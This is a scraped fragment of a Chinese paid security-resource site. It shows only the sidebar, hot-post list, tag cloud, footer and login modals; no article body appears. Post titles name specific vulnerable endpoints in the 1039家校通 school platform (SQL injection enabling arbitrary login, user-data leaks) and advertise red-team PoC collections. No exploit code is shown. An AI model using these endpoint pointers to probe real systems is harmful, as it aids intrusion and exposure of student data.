em09"></i>218</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 188W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>188W+</span></div><div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div></div></div><div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/55691/">PHP安全之道—项目安全的架构、技术与实践+-+.pdf</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/55635/">1039家校通 TeacherLogin.ashx SQL注入导致任意登录</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/55634/">1039家校通 StuSQPS.ashx 存在用户信息泄露</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/55633/">1039家校通 LiuShiZhang.ashx 存在用户信息泄露</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/55632/">1039家校通 StuApi.asmx 用户信息泄露</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/55631/">1039家校通 io_train.asmx 任意用户添加</a></div></div></div></div></div><div></div><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-red">1</span><a  href="https://vip.bdziyi.com/55661/">元宵节快乐 某星球漏洞库&完整文章&附件下载 第一弹<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/2626/"><span class="avatar-mini"><img alt="kariko的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/12/20241208164213136.jpg" class="lazyload avatar avatar-id-2626"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">2月12日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费阅读"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>1109</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-yellow">2</span><a  href="https://vip.bdziyi.com/55595/">谷歌插件-ChromeDomainInfo内部版-增加企业信息查询<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">2月11日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费阅读"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>985</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-purple">3</span><a  href="https://vip.bdziyi.com/55676/">goby红队版poc 截止 25年2月8日<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1568/"><span class="avatar-mini"><img alt="1inc50的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/08/20240807112133235.jpg" class="lazyload avatar avatar-id-1568"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">2月13日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费阅读"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>957</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-blue">4</span><a  href="https://vip.bdziyi.com/55559/">某星球内部工具eyesec-快速且准确筛选真实IP并整理为C段<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/3107/"><span class="avatar-mini"><img alt="4123414qwerq的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" class="lazyload avatar avatar-id-3107"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">2月10日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费资源"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>764</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-green">5</span><a  href="https://vip.bdziyi.com/55529/">【投稿】会员站内网靶场1、2、3、4、7WP<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/2657/"><span class="avatar-mini"><img alt="Redbag的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//thirdwx.qlogo.cn/mmopen/vi_32/Z74w1ziaTmzQP92ugXliaEX1VSlYr2NxVxXIgCDn0rByUyywhj7Soae6HwB0HibKpwHnIyrrLV9dx6h9AFoGeIHKXAkc33DBhz5ELlr2ic9rq9w/132" class="lazyload avatar avatar-id-2657"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">2月8日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费阅读"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>710</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 ">6</span><a  href="https://vip.bdziyi.com/55634/">1039家校通 StuSQPS.ashx 存在用户信息泄露<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">2月12日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>544</item></div></div></div></div></div></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="zib-widget widget-tag-cloud author-tag"><a href="https://vip.bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but c-green-2">龙浏览器未引用的服务路径特权升级</a><a href="https://vip.bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but c-purple-2">齿轮地理位置查询</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red-2">鼠标鼠标按钮命令注入远程</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-blue">鼠标远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-yellow">鼠标远程代码</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-green">鼠标路径遍历</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but c-purple">鼠标本地文件包含</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-red">鼠标未引用的服务路径</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but ">鼠标事件状态栏</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-blue-2">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-yellow-2">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-green-2">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but c-purple-2">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red-2">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-blue">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-yellow">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-green">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-purple">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but ">默认和弱加密</a></div></div></div></main><div class="container fluid-widget"></div><footer class="footer"><div class="container-fluid container-footer"><ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-网络安全资源大全-漏洞库"> <img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-网络安全资源大全-漏洞库" class="lazyload" style="height: 40px;"> </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a> <a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">广告合作</a></p><div class="footer-muted em09">Copyright © 2024 · <a href="https://vip.bdziyi.com">棉花糖会员站</a><p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">沪ICP备2023017240号</a></p></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信"><p> <img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫码加微信-棉花糖会员站"></p> <span class="opacity8 em09">扫码加微信</span></div></li></ul></div></footer> <script type="text/javascript">window._win = {
            views: '2329',
            www: 'https://vip.bdziyi.com',
            uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
            ver: '7.9_beta2',
            imgbox: '1',
            imgbox_type: 'group',
            imgbox_thumbs: '1',
            imgbox_zoom: '1',
            imgbox_full: '1',
            imgbox_play: '1',
            imgbox_down: '1',
            sign_type: 'modal',
            signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2329%2F',
            signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2329%2F',
            ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
            ajaxpager: '',
            ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
            ajax_nomore: '没有更多内容了',
            qj_loading: '1',
            highlight_kg: '1',
            highlight_hh: '1',
            highlight_btn: '1',
            highlight_zt: 'enlighter',
            highlight_white_zt: 'enlighter',
            highlight_dark_zt: 'dracula',
            upload_img_size: '3',
            img_upload_multiple: '6',
            upload_video_size: '30',
            upload_file_size: '30',
            upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
            user_upload_nonce: '16085481f0',
            is_split_upload: '1',
            split_minimum_size: '20',
            comment_upload_img: '1'
        }</script> <div class="float-right round position-bottom"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn"> <svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg><div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div> </span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png"  alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p><p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p><p class="placeholder k1" style="height: 80px;"></p></div></div></div></div><div class="modal fade" id="u_sign" tabindex="-1" role="dialog"><div class="modal-dialog" role="document"><div class="sign-content"><div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-网络安全资源大全-漏洞库"></div><div class="sign zib-widget blur-bg relative"> <button class="close" data-dismiss="modal"> <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg> </button><div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-网络安全资源大全-漏洞库" class="lazyload"></div></div><div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号？立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2329%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2329%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号，立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="2291e04b1e" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div></div></div></div></div><div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini" style="" role="document"><div class="modal-content"><div class="modal-body"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body><p style="color: orange;">新版现已发布，新增多项新功能及细节优化，欢迎体验</p><p style="color: blue;">独家代码审计、凌风云自助获取、IP街道级定位等功能已上线</p><p style="color: green;">网络安全从拥有一个资源大全开始！</p><p style="color: red;">现在购买仅需99元一年！续费还享八折！</p> <script defer src="https://vip.bdziyi.com/wp-content/cache/autoptimize/js/autoptimize_484fcf6d88f4cdc1383c2322e0d74667.js"></script></body></div></div></div><div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div></div></div></div> <script type="text/javascript">window.onload = function(){
        setTimeout(function () {$('#modal-system-notice').modal('show');
        $.cookie("showed_system_notice","showed", {path: "/",expires: 1});
    }, 500)};</script> <script type="text/javascript">var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var links = document.querySelectorAll('.item-tags a');

for (var i = 0; i < links.length; i++) {
  var randomColor;
  do {
    var r = Math.floor(Math.random() * 128) + 128;
    var g = Math.floor(Math.random() * 128) + 128;
    var b = Math.floor(Math.random() * 128) + 128;
    randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
  } while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200

  links[i].style.backgroundColor = randomColor;
}

//视频
$(document).ready(function() {
    $('#xiayg').on('click', function() {
        var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');

        if ($videoElement.length) {
            $videoElement.attr('src', 'https://api.86512.cn/api/web.php');
            $videoElement[0].load();
            $videoElement[0].play();
        } else {
            console.error('找不到视频元素');
        }
    });
});</script>  <script type="text/javascript">(function() {
            var bp = document.createElement('script');
